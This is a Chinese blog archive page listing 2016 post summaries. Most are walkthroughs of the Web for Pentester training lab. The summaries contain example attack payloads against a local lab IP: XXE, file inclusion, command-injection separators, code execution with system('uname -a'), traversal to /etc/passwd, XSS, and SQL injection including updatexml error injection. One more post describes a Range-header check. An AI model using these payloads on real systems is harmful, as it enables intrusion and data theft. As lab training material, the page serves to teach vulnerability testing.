07 2016 档案

摘要:example1: http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21EN 阅读全文
posted @ 2016-07-22 16:18 Bypass 阅读(594) 评论(0) 推荐(0) 编辑
摘要:Example 1 输入单引号,报错,得到物理路径 可通过../../../../etc/paaswd 读取敏感信息 可包含本地文件或远程文件 https://assets.pentesterlab.com/test_include.txt Example 2 加单引号,报错,可发现获取到的参数后面 阅读全文
posted @ 2016-07-22 15:57 Bypass 阅读(1882) 评论(1) 推荐(0) 编辑
摘要:命令执行漏洞 windows支持: | ping 127.0.0.1|whoami || ping 2 || whoami (哪条名令为真执行那条) & && ping 127.0.0.1&&whoami Linux支持: ; 127.0.0.1;whoami | 127.0.0.1|whoami 阅读全文
posted @ 2016-07-21 16:59 Bypass 阅读(1089) 评论(0) 推荐(0) 编辑
摘要:Example 1 http://192.168.106.154/codeexec/example1.php?name=".system('uname -a');// Example 2 http://192.168.106.154/codeexec/example2.php?order=id);} 阅读全文
posted @ 2016-07-21 16:58 Bypass 阅读(748) 评论(0) 推荐(0) 编辑
摘要:Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 http://192.168.106.154/dirtrav/example2.php?file= 阅读全文
posted @ 2016-07-21 16:41 Bypass 阅读(742) 评论(0) 推荐(0) 编辑
摘要:Example 1 http://192.168.91.139/xss/example1.php?name=hacker<script>alert('xss')</script> Example 2 http://192.168.91.139/xss/example2.php?name=hacker 阅读全文
posted @ 2016-07-21 16:39 Bypass 阅读(1128) 评论(0) 推荐(0) 编辑
摘要:Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23 http://192.168.9 阅读全文
posted @ 2016-07-21 15:13 Bypass 阅读(6444) 评论(0) 推荐(0) 编辑
摘要:web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。 官网:https://www.pentesterlab.com 下载地址:https://www.pentesterlab.com/exercises/web_for_pen 阅读全文
posted @ 2016-07-21 15:12 Bypass 阅读(3999) 评论(2) 推荐(0) 编辑
摘要:Insert: 语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....) 报错注入: insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e 阅读全文
posted @ 2016-07-21 10:06 Bypass 阅读(1809) 评论(0) 推荐(0) 编辑
摘要:使用发包工具构造http请求包检测 以fiddler工具为例,构造如下图的请求包: 1 GET http://192.168.174.145/ HTTP/1.12 Host: 192.168.174.1453 Range: bytes=0-184467440737095516154 Connecti 阅读全文
posted @ 2016-07-07 14:37 Bypass 阅读(11413) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示